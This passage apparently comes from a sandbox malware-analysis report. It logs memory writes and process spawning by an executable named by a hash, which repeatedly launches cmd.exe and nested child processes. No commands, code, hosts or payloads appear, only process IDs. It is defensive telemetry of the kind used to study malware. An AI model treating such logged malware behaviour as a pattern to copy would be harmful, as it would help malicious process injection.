PID 1676 wrote to memory of 864 1676 cmd.exe 105 PID 1676 wrote to memory of 864 1676 cmd.exe 105 PID 1096 wrote to memory of 960 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 106 PID 1096 wrote to memory of 960 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 106 PID 1096 wrote to memory of 960 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 106 PID 1096 wrote to memory of 960 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 106 PID 960 wrote to memory of 1032 960 cmd.exe 108 PID 960 wrote to memory of 1032 960 cmd.exe 108 PID 960 wrote to memory of 1032 960 cmd.exe 108 PID 960 wrote to memory of 1032 960 cmd.exe 108 PID 960 wrote to memory of 672 960 cmd.exe 109 PID 960 wrote to memory of 672 960 cmd.exe 109 PID 960 wrote to memory of 672 960 cmd.exe 109 PID 960 wrote to memory of 672 960 cmd.exe 109 PID 960 wrote to memory of 1284 960 cmd.exe 110 PID 960 wrote to memory of 1284 960 cmd.exe 110 PID 960 wrote to memory of 1284 960 cmd.exe 110 PID 960 wrote to memory of 1284 960 cmd.exe 110 PID 1284 wrote to memory of 1836 1284 cmd.exe 111 PID 1284 wrote to memory of 1836 1284 cmd.exe 111 PID 1284 wrote to memory of 1836 1284 cmd.exe 111 PID 1284 wrote to memory of 1836 1284 cmd.exe 111 PID 960 wrote to memory of 1668 960 cmd.exe 112 PID 960 wrote to memory of 1668 960 cmd.exe 112 PID 960 wrote to memory of 1668 960 cmd.exe 112 PID 960 wrote to memory of 1668 960 cmd.exe 112 PID 1096 wrote to memory of 532 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 113 PID 1096 wrote to memory of 532 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 113 PID 1096 wrote to memory of 532 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 113 PID 1096 wrote to memory of 532 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 113 PID 532 wrote to memory of 1560 532 cmd.exe 115 PID 532 wrote to memory of 1560 532 cmd.exe 115 PID 532 wrote to memory of 1560 532 cmd.exe 115 PID 532 wrote to memory of 1560 532 cmd.exe 115 PID 532 wrote to memory of 776 532 cmd.exe 116 PID 532 wrote to memory of 776 532 cmd.exe 116 PID 532 wrote to memory of 776 532 cmd.exe 116 PID 532 wrote to memory of 776 532 cmd.exe 116 PID 532 wrote to memory of 1464 532 cmd.exe 117 PID 532 wrote to memory of 1464 532 cmd.exe 117 PID 532 wrote to memory of 1464 532 cmd.exe 117 PID 532 wrote to memory of 1464 532 cmd.exe 117 PID 1464 wrote to memory of 1992 1464 cmd.exe 118 PID 1464 wrote to memory of 1992 1464 cmd.exe 118 PID 1464 wrote to memory of 1992 1464 cmd.exe 118 PID 1464 wrote to memory of 1992 1464 cmd.exe 118 PID 532 wrote to memory of 316 532 cmd.exe 119 PID 532 wrote to memory of 316 532 cmd.exe 119 PID 532 wrote to memory of 316 532 cmd.exe 119 PID 532 wrote to memory of 316 532 cmd.exe 119 PID 1096 wrote to memory of 340 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 120 PID 1096 wrote to memory of 340 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 120 PID 1096 wrote to memory of 340 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 120 PID 1096 wrote to memory of 340 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 120 PID 340 wrote to memory of 420 340 cmd.exe 122 PID 340 wrote to memory of 420 340 cmd.exe 122 PID 340 wrote to memory of 420 340 cmd.exe 122 PID 340 wrote to memory of 420 340 cmd.exe 122 PID 340 wrote to memory of 1496 340 cmd.exe 123 PID 340 wrote to memory of 1496 340 cmd.exe 123 PID 340 wrote to memory of 1496 340 cmd.exe 123 PID 340 wrote to memory of 1496 340 cmd.exe 123 PID 340 wrote to memory of 796 340 cmd.exe 124 PID 340 wrote to memory of 796 340 cmd.exe 124 PID 340 wrote to memory of 796 340 cmd.exe 124 PID 340 wrote to memory of 796 340 cmd.exe 124 PID 796 wrote to memory of 996 796 cmd.exe 125 PID 796 wrote to memory of 996 796 cmd.exe 125 PID 796 wrote to memory of 996 796 cmd.exe 125 PID 796 wrote to memory of 996 796 cmd.exe 125 PID 340 wrote to memory of 1076 340 cmd.exe 126 PID 340 wrote to memory of 1076 340 cmd.exe 126 PID 340 wrote to memory of 1076 340 cmd.exe 126 PID 340 wrote to memory of 1076 340 cmd.exe 126 PID 1096 wrote to memory of 864 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 127 PID 1096 wrote to memory of 864 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 127 PID 1096 wrote to memory of 864 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 127 PID 1096 wrote to memory of 864 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 127 PID 864 wrote to memory of 852 864 cmd.exe 129 PID 864 wrote to memory of 852 864 cmd.exe 129 PID 864 wrote to memory of 852 864 cmd.exe 129 PID 864 wrote to memory of 852 864 cmd.exe 129 PID 864 wrote to memory of 1032 864 cmd.exe 130 PID 864 wrote to memory of 1032 864 cmd.exe 130 PID 864 wrote to memory of 1032 864 cmd.exe 130 PID 864 wrote to memory of 1032 864 cmd.exe 130 PID 864 wrote to memory of 1516 864 cmd.exe 131 PID 864 wrote to memory of 1516 864 cmd.exe 131 PID 864 wrote to memory of 1516 864 cmd.exe 131 PID 864 wrote to memory of 1516 864 cmd.exe 131 PID 1516 wrote to memory of 1792 1516 cmd.exe 132 PID 1516 wrote to memory of 1792 1516 cmd.exe 132 PID 1516 wrote to memory of 1792 1516 cmd.exe 132 PID 1516 wrote to memory of 1792 1516 cmd.exe 132 PID 864 wrote to memory of 1872 864 cmd.exe 133 PID 864 wrote to memory of 1872 864 cmd.exe 133 PID 864 wrote to memory of 1872 864 cmd.exe 133 PID 864 wrote to memory of 1872 864 cmd.exe 133 PID 1096 wrote to memory of 960 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 134 PID 1096 wrote to memory of 960 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 134 PID 1096 wrote to memory of 960 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 134 PID 1096 wrote to memory of 960 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 134 PID 960 wrote to memory of 1784 960 cmd.exe 136 PID 960 wrote to memory of 1784 960 cmd.exe 136 PID 960 wrote to memory of 1784 960 cmd.exe 136 PID 960 wrote to memory of 1784 960 cmd.exe 136 PID 960 wrote to memory of 712 960 cmd.exe 137 PID 960 wrote to memory of 712 960 cmd.exe 137 PID 960 wrote to memory of 712 960 cmd.exe 137 PID 960 wrote to memory of 712 960 cmd.exe 137 PID 960 wrote to memory of 1868 960 cmd.exe 138 PID 960 wrote to memory of 1868 960 cmd.exe 138 PID 960 wrote to memory of 1868 960 cmd.exe 138 PID 960 wrote to memory of 1868 960 cmd.exe 138 PID 1868 wrote to memory of 1144 1868 cmd.exe 139 PID 1868 wrote to memory of 1144 1868 cmd.exe 139 PID 1868 wrote to memory of 1144 1868 cmd.exe 139 PID 1868 wrote to memory of 1144 1868 cmd.exe 139 PID 960 wrote to memory of 928 960 cmd.exe 140 PID 960 wrote to memory of 928 960 cmd.exe 140 PID 960 wrote to memory of 928 960 cmd.exe 140 PID 960 wrote to memory of 928 960 cmd.exe 140 PID 1096 wrote to memory of 532 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 142 PID 1096 wrote to memory of 532 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 142 PID 1096 wrote to memory of 532 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 142 PID 1096 wrote to memory of 532 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 142 PID 532 wrote to memory of 792 532 cmd.exe 144 PID 532 wrote to memory of 792 532 cmd.exe 144 PID 532 wrote to memory of 792 532 cmd.exe 144 PID 532 wrote to memory of 792 532 cmd.exe 144 PID 532 wrote to memory of 1372 532 cmd.exe 145 PID 532 wrote to memory of 1372 532 cmd.exe 145 PID 532 wrote to memory of 1372 532 cmd.exe 145 PID 532 wrote to memory of 1372 532 cmd.exe 145 PID 532 wrote to memory of 1148 532 cmd.exe 146 PID 532 wrote to memory of 1148 532 cmd.exe 146 PID 532 wrote to memory of 1148 532 cmd.exe 146 PID 532 wrote to memory of 1148 532 cmd.exe 146 PID 1148 wrote to memory of 1796 1148 cmd.exe 147 PID 1148 wrote to memory of 1796 1148 cmd.exe 147 PID 1148 wrote to memory of 1796 1148 cmd.exe 147 PID 1148 wrote to memory of 1796 1148 cmd.exe 147 PID 1584 wrote to memory of 1500 1584 cmd.exe 148 PID 1584 wrote to memory of 1500 1584 cmd.exe 148 PID 1584 wrote to memory of 1500 1584 cmd.exe 148 PID 532 wrote to memory of 1008 532 cmd.exe 149 PID 532 wrote to memory of 1008 532 cmd.exe 149 PID 532 wrote to memory of 1008 532 cmd.exe 149 PID 532 wrote to memory of 1008 532 cmd.exe 149 PID 1096 wrote to memory of 948 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 150 PID 1096 wrote to memory of 948 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 150 PID 1096 wrote to memory of 948 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 150 PID 1096 wrote to memory of 948 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 150 PID 948 wrote to memory of 1032 948 cmd.exe 152 PID 948 wrote to memory of 1032 948 cmd.exe 152 PID 948 wrote to memory of 1032 948 cmd.exe 152 PID 948 wrote to memory of 1032 948 cmd.exe 152 PID 948 wrote to memory of 1284 948 cmd.exe 153 PID 948 wrote to memory of 1284 948 cmd.exe 153 PID 948 wrote to memory of 1284 948 cmd.exe 153 PID 948 wrote to memory of 1284 948 cmd.exe 153 PID 948 wrote to memory of 1376 948 cmd.exe 154 PID 948 wrote to memory of 1376 948 cmd.exe 154 PID 948 wrote to memory of 1376 948 cmd.exe 154 PID 948 wrote to memory of 1376 948 cmd.exe 154 PID 1376 wrote to memory of 1668 1376 cmd.exe 155 PID 1376 wrote to memory of 1668 1376 cmd.exe 155 PID 1376 wrote to memory of 1668 1376 cmd.exe 155 PID 1376 wrote to memory of 1668 1376 cmd.exe 155 PID 948 wrote to memory of 1756 948 cmd.exe 156 PID 948 wrote to memory of 1756 948 cmd.exe 156 PID 948 wrote to memory of 1756 948 cmd.exe 156 PID 948 wrote to memory of 1756 948 cmd.exe 156 PID 1096 wrote to memory of 820 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 157 PID 1096 wrote to memory of 820 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 157 PID 1096 wrote to memory of 820 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 157 PID 1096 wrote to memory of 820 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 157 PID 820 wrote to memory of 1052 820 cmd.exe 159 PID 820 wrote to memory of 1052 820 cmd.exe 159 PID 820 wrote to memory of 1052 820 cmd.exe 159 PID 820 wrote to memory of 1052 820 cmd.exe 159 PID 820 wrote to memory of 1876 820 cmd.exe 160 PID 820 wrote to memory of 1876 820 cmd.exe 160 PID 820 wrote to memory of 1876 820 cmd.exe 160 PID 820 wrote to memory of 1876 820 cmd.exe 160 PID 820 wrote to memory of 968 820 cmd.exe 162 PID 820 wrote to memory of 968 820 cmd.exe 162 PID 820 wrote to memory of 968 820 cmd.exe 162 PID 820 wrote to memory of 968 820 cmd.exe 162 PID 968 wrote to memory of 240 968 cmd.exe 163 PID 968 wrote to memory of 240 968 cmd.exe 163 PID 968 wrote to memory of 240 968 cmd.exe 163 PID 968 wrote to memory of 240 968 cmd.exe 163 PID 820 wrote to memory of 1392 820 cmd.exe 164 PID 820 wrote to memory of 1392 820 cmd.exe 164 PID 820 wrote to memory of 1392 820 cmd.exe 164 PID 820 wrote to memory of 1392 820 cmd.exe 164 PID 1096 wrote to memory of 900 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 165 PID 1096 wrote to memory of 900 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 165 PID 1096 wrote to memory of 900 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 165 PID 1096 wrote to memory of 900 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 165 PID 900 wrote to memory of 1076 900 cmd.exe 167 PID 900 wrote to memory of 1076 900 cmd.exe 167 PID 900 wrote to memory of 1076 900 cmd.exe 167 PID 900 wrote to memory of 1076 900 cmd.exe 167 PID 900 wrote to memory of 796 900 cmd.exe 168 PID 900 wrote to memory of 796 900 cmd.exe 168 PID 900 wrote to memory of 796 900 cmd.exe 168 PID 900 wrote to memory of 796 900 cmd.exe 168 PID 900 wrote to memory of 1956 900 cmd.exe 169 PID 900 wrote to memory of 1956 900 cmd.exe 169 PID 900 wrote to memory of 1956 900 cmd.exe 169 PID 900 wrote to memory of 1956 900 cmd.exe 169 PID 1956 wrote to memory of 1008 1956 cmd.exe 170 PID 1956 wrote to memory of 1008 1956 cmd.exe 170 PID 1956 wrote to memory of 1008 1956 cmd.exe 170 PID 1956 wrote to memory of 1008 1956 cmd.exe 170 PID 900 wrote to memory of 1276 900 cmd.exe 171 PID 900 wrote to memory of 1276 900 cmd.exe 171 PID 900 wrote to memory of 1276 900 cmd.exe 171 PID 900 wrote to memory of 1276 900 cmd.exe 171 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 172 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 172 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 172 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 172 PID 1836 wrote to memory of 1472 1836 cmd.exe 174 PID 1836 wrote to memory of 1472 1836 cmd.exe 174 PID 1836 wrote to memory of 1472 1836 cmd.exe 174 PID 1836 wrote to memory of 1472 1836 cmd.exe 174 PID 1836 wrote to memory of 1668 1836 cmd.exe 175 PID 1836 wrote to memory of 1668 1836 cmd.exe 175 PID 1836 wrote to memory of 1668 1836 cmd.exe 175 PID 1836 wrote to memory of 1668 1836 cmd.exe 175 PID 1836 wrote to memory of 1676 1836 cmd.exe 176 PID 1836 wrote to memory of 1676 1836 cmd.exe 176 PID 1836 wrote to memory of 1676 1836 cmd.exe 176 PID 1836 wrote to memory of 1676 1836 cmd.exe 176 PID 1676 wrote to memory of 1756 1676 cmd.exe 177 PID 1676 wrote to memory of 1756 1676 cmd.exe 177 PID 1676 wrote to memory of 1756 1676 cmd.exe 177 PID 1676 wrote to memory of 1756 1676 cmd.exe 177 PID 1836 wrote to memory of 888 1836 cmd.exe 178 PID 1836 wrote to memory of 888 1836 cmd.exe 178 PID 1836 wrote to memory of 888 1836 cmd.exe 178 PID 1836 wrote to memory of 888 1836 cmd.exe 178 PID 1096 wrote to memory of 316 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 179 PID 1096 wrote to memory of 316 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 179 PID 1096 wrote to memory of 316 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 179 PID 1096 wrote to memory of 316 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 179 PID 316 wrote to memory of 1068 316 cmd.exe 182 PID 316 wrote to memory of 1068 316 cmd.exe 182 PID 316 wrote to memory of 1068 316 cmd.exe 182 PID 316 wrote to memory of 1068 316 cmd.exe 182 PID 316 wrote to memory of 1372 316 cmd.exe 183 PID 316 wrote to memory of 1372 316 cmd.exe 183 PID 316 wrote to memory of 1372 316 cmd.exe 183 PID 316 wrote to memory of 1372 316 cmd.exe 183 PID 316 wrote to memory of 1148 316 cmd.exe 184 PID 316 wrote to memory of 1148 316 cmd.exe 184 PID 316 wrote to memory of 1148 316 cmd.exe 184 PID 316 wrote to memory of 1148 316 cmd.exe 184 PID 1148 wrote to memory of 904 1148 cmd.exe 185 PID 1148 wrote to memory of 904 1148 cmd.exe 185 PID 1148 wrote to memory of 904 1148 cmd.exe 185 PID 1148 wrote to memory of 904 1148 cmd.exe 185 PID 316 wrote to memory of 1956 316 cmd.exe 186 PID 316 wrote to memory of 1956 316 cmd.exe 186 PID 316 wrote to memory of 1956 316 cmd.exe 186 PID 316 wrote to memory of 1956 316 cmd.exe 186 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 187 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 187 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 187 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 187 PID 1276 wrote to memory of 1744 1276 cmd.exe 189 PID 1276 wrote to memory of 1744 1276 cmd.exe 189 PID 1276 wrote to memory of 1744 1276 cmd.exe 189 PID 1276 wrote to memory of 1744 1276 cmd.exe 189 PID 1276 wrote to memory of 1472 1276 cmd.exe 190 PID 1276 wrote to memory of 1472 1276 cmd.exe 190 PID 1276 wrote to memory of 1472 1276 cmd.exe 190 PID 1276 wrote to memory of 1472 1276 cmd.exe 190 PID 1276 wrote to memory of 1668 1276 cmd.exe 191 PID 1276 wrote to memory of 1668 1276 cmd.exe 191 PID 1276 wrote to memory of 1668 1276 cmd.exe 191 PID 1276 wrote to memory of 1668 1276 cmd.exe 191 PID 1668 wrote to memory of 1756 1668 cmd.exe 192 PID 1668 wrote to memory of 1756 1668 cmd.exe 192 PID 1668 wrote to memory of 1756 1668 cmd.exe 192 PID 1668 wrote to memory of 1756 1668 cmd.exe 192 PID 1276 wrote to memory of 1052 1276 cmd.exe 193 PID 1276 wrote to memory of 1052 1276 cmd.exe 193 PID 1276 wrote to memory of 1052 1276 cmd.exe 193 PID 1276 wrote to memory of 1052 1276 cmd.exe 193 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 194 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 194 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 194 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 194 PID 1836 wrote to memory of 240 1836 cmd.exe 196 PID 1836 wrote to memory of 240 1836 cmd.exe 196 PID 1836 wrote to memory of 240 1836 cmd.exe 196 PID 1836 wrote to memory of 240 1836 cmd.exe 196 PID 1836 wrote to memory of 1068 1836 cmd.exe 197 PID 1836 wrote to memory of 1068 1836 cmd.exe 197 PID 1836 wrote to memory of 1068 1836 cmd.exe 197 PID 1836 wrote to memory of 1068 1836 cmd.exe 197 PID 1836 wrote to memory of 1076 1836 cmd.exe 198 PID 1836 wrote to memory of 1076 1836 cmd.exe 198 PID 1836 wrote to memory of 1076 1836 cmd.exe 198 PID 1836 wrote to memory of 1076 1836 cmd.exe 198 PID 1076 wrote to memory of 1212 1076 cmd.exe 199 PID 1076 wrote to memory of 1212 1076 cmd.exe 199 PID 1076 wrote to memory of 1212 1076 cmd.exe 199 PID 1076 wrote to memory of 1212 1076 cmd.exe 199 PID 1836 wrote to memory of 532 1836 cmd.exe 200 PID 1836 wrote to memory of 532 1836 cmd.exe 200 PID 1836 wrote to memory of 532 1836 cmd.exe 200 PID 1836 wrote to memory of 532 1836 cmd.exe 200 PID 1096 wrote to memory of 616 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 201 PID 1096 wrote to memory of 616 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 201 PID 1096 wrote to memory of 616 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 201 PID 1096 wrote to memory of 616 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 201 PID 616 wrote to memory of 316 616 cmd.exe 203 PID 616 wrote to memory of 316 616 cmd.exe 203 PID 616 wrote to memory of 316 616 cmd.exe 203 PID 616 wrote to memory of 316 616 cmd.exe 203 PID 616 wrote to memory of 1516 616 cmd.exe 204 PID 616 wrote to memory of 1516 616 cmd.exe 204 PID 616 wrote to memory of 1516 616 cmd.exe 204 PID 616 wrote to memory of 1516 616 cmd.exe 204 PID 616 wrote to memory of 1872 616 cmd.exe 205 PID 616 wrote to memory of 1872 616 cmd.exe 205 PID 616 wrote to memory of 1872 616 cmd.exe 205 PID 616 wrote to memory of 1872 616 cmd.exe 205 PID 1872 wrote to memory of 568 1872 cmd.exe 206 PID 1872 wrote to memory of 568 1872 cmd.exe 206 PID 1872 wrote to memory of 568 1872 cmd.exe 206 PID 1872 wrote to memory of 568 1872 cmd.exe 206 PID 616 wrote to memory of 888 616 cmd.exe 207 PID 616 wrote to memory of 888 616 cmd.exe 207 PID 616 wrote to memory of 888 616 cmd.exe 207 PID 616 wrote to memory of 888 616 cmd.exe 207 PID 1096 wrote to memory of 1808 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 208 PID 1096 wrote to memory of 1808 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 208 PID 1096 wrote to memory of 1808 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 208 PID 1096 wrote to memory of 1808 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 208 PID 1808 wrote to memory of 820 1808 cmd.exe 210 PID 1808 wrote to memory of 820 1808 cmd.exe 210 PID 1808 wrote to memory of 820 1808 cmd.exe 210 PID 1808 wrote to memory of 820 1808 cmd.exe 210 PID 1808 wrote to memory of 1036 1808 cmd.exe 211 PID 1808 wrote to memory of 1036 1808 cmd.exe 211 PID 1808 wrote to memory of 1036 1808 cmd.exe 211 PID 1808 wrote to memory of 1036 1808 cmd.exe 211 PID 1808 wrote to memory of 1120 1808 cmd.exe 212 PID 1808 wrote to memory of 1120 1808 cmd.exe 212 PID 1808 wrote to memory of 1120 1808 cmd.exe 212 PID 1808 wrote to memory of 1120 1808 cmd.exe 212 PID 1120 wrote to memory of 828 1120 cmd.exe 213 PID 1120 wrote to memory of 828 1120 cmd.exe 213 PID 1120 wrote to memory of 828 1120 cmd.exe 213 PID 1120 wrote to memory of 828 1120 cmd.exe 213 PID 1808 wrote to memory of 1480 1808 cmd.exe 214 PID 1808 wrote to memory of 1480 1808 cmd.exe 214 PID 1808 wrote to memory of 1480 1808 cmd.exe 214 PID 1808 wrote to memory of 1480 1808 cmd.exe 214 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 215 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 215 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 215 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 215 PID 1836 wrote to memory of 1800 1836 cmd.exe 217 PID 1836 wrote to memory of 1800 1836 cmd.exe 217 PID 1836 wrote to memory of 1800 1836 cmd.exe 217 PID 1836 wrote to memory of 1800 1836 cmd.exe 217 PID 1836 wrote to memory of 1744 1836 cmd.exe 218 PID 1836 wrote to memory of 1744 1836 cmd.exe 218 PID 1836 wrote to memory of 1744 1836 cmd.exe 218 PID 1836 wrote to memory of 1744 1836 cmd.exe 218 PID 1836 wrote to memory of 1472 1836 cmd.exe 219 PID 1836 wrote to memory of 1472 1836 cmd.exe 219 PID 1836 wrote to memory of 1472 1836 cmd.exe 219 PID 1836 wrote to memory of 1472 1836 cmd.exe 219 PID 1472 wrote to memory of 948 1472 cmd.exe 220 PID 1472 wrote to memory of 948 1472 cmd.exe 220 PID 1472 wrote to memory of 948 1472 cmd.exe 220 PID 1472 wrote to memory of 948 1472 cmd.exe 220 PID 1836 wrote to memory of 1052 1836 cmd.exe 221 PID 1836 wrote to memory of 1052 1836 cmd.exe 221 PID 1836 wrote to memory of 1052 1836 cmd.exe 221 PID 1836 wrote to memory of 1052 1836 cmd.exe 221 PID 1096 wrote to memory of 616 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 222 PID 1096 wrote to memory of 616 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 222 PID 1096 wrote to memory of 616 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 222 PID 1096 wrote to memory of 616 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 222 PID 616 wrote to memory of 1816 616 cmd.exe 224 PID 616 wrote to memory of 1816 616 cmd.exe 224 PID 616 wrote to memory of 1816 616 cmd.exe 224 PID 616 wrote to memory of 1816 616 cmd.exe 224 PID 616 wrote to memory of 1036 616 cmd.exe 225 PID 616 wrote to memory of 1036 616 cmd.exe 225 PID 616 wrote to memory of 1036 616 cmd.exe 225 PID 616 wrote to memory of 1036 616 cmd.exe 225 PID 616 wrote to memory of 1372 616 cmd.exe 226 PID 616 wrote to memory of 1372 616 cmd.exe 226 PID 616 wrote to memory of 1372 616 cmd.exe 226 PID 616 wrote to memory of 1372 616 cmd.exe 226 PID 1372 wrote to memory of 1688 1372 cmd.exe 227 PID 1372 wrote to memory of 1688 1372 cmd.exe 227 PID 1372 wrote to memory of 1688 1372 cmd.exe 227 PID 1372 wrote to memory of 1688 1372 cmd.exe 227 PID 616 wrote to memory of 1464 616 cmd.exe 228 PID 616 wrote to memory of 1464 616 cmd.exe 228 PID 616 wrote to memory of 1464 616 cmd.exe 228 PID 616 wrote to memory of 1464 616 cmd.exe 228 PID 1096 wrote to memory of 1040 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 229 PID 1096 wrote to memory of 1040 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 229 PID 1096 wrote to memory of 1040 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 229 PID 1096 wrote to memory of 1040 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 229 PID 1040 wrote to memory of 1376 1040 cmd.exe 231 PID 1040 wrote to memory of 1376 1040 cmd.exe 231 PID 1040 wrote to memory of 1376 1040 cmd.exe 231 PID 1040 wrote to memory of 1376 1040 cmd.exe 231 PID 1040 wrote to memory of 1092 1040 cmd.exe 232 PID 1040 wrote to memory of 1092 1040 cmd.exe 232 PID 1040 wrote to memory of 1092 1040 cmd.exe 232 PID 1040 wrote to memory of 1092 1040 cmd.exe 232 PID 1040 wrote to memory of 1152 1040 cmd.exe 233 PID 1040 wrote to memory of 1152 1040 cmd.exe 233 PID 1040 wrote to memory of 1152 1040 cmd.exe 233 PID 1040 wrote to memory of 1152 1040 cmd.exe 233 PID 1152 wrote to memory of 1676 1152 cmd.exe 234 PID 1152 wrote to memory of 1676 1152 cmd.exe 234 PID 1152 wrote to memory of 1676 1152 cmd.exe 234 PID 1152 wrote to memory of 1676 1152 cmd.exe 234 PID 1040 wrote to memory of 1548 1040 cmd.exe 235 PID 1040 wrote to memory of 1548 1040 cmd.exe 235 PID 1040 wrote to memory of 1548 1040 cmd.exe 235 PID 1040 wrote to memory of 1548 1040 cmd.exe 235 PID 1096 wrote to memory of 320 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 236 PID 1096 wrote to memory of 320 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 236 PID 1096 wrote to memory of 320 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 236 PID 1096 wrote to memory of 320 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 236 PID 320 wrote to memory of 792 320 cmd.exe 238 PID 320 wrote to memory of 792 320 cmd.exe 238 PID 320 wrote to memory of 792 320 cmd.exe 238 PID 320 wrote to memory of 792 320 cmd.exe 238 PID 320 wrote to memory of 796 320 cmd.exe 239 PID 320 wrote to memory of 796 320 cmd.exe 239 PID 320 wrote to memory of 796 320 